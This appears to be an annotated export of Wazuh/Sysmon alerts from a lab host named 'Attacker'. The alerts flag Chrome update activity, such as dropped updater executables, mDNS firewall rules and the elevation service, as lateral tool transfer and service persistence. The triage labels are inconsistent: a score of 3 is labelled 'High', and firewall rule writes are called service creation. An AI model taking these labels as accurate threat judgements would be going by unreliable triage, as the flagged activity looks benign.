No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:01.6661763Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225394
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:01.664 ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00} ProcessId: 12284 Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\135.0.7049.96_135.0.7049.86_chrome_updater.exe CreationUtcTime: 2025-04-20 01:41:01.664 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:01.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a3-6804-9f08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\135.0.7049.96_135.0.7049.86_chrome_updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:41:01.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:17.594+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:17.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534057.598703
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:01.9448813Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225427
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:01.943 ProcessGuid: {94294ddc-50ad-6804-ba08-000000000e00} ProcessId: 13184 Image: C:\Program Files\Google\Chrome\Application\135.0.7049.86\Installer\setup.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe CreationUtcTime: 2025-04-20 01:41:01.943 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:01.943
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50ad-6804-ba08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Program Files\Google\Chrome\Application\135.0.7049.86\Installer\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:41:01.943
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.750+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.750+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.601600
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3160671Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225933
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.315 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.315
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\system32\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.815+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.815+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.605893
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3543878Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225936
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.351 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.351
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.863+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.863+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.610121
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3671970Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225940
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.364 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.96\elevation_service.exe" User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:22.299+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:22.299+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534062.613301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

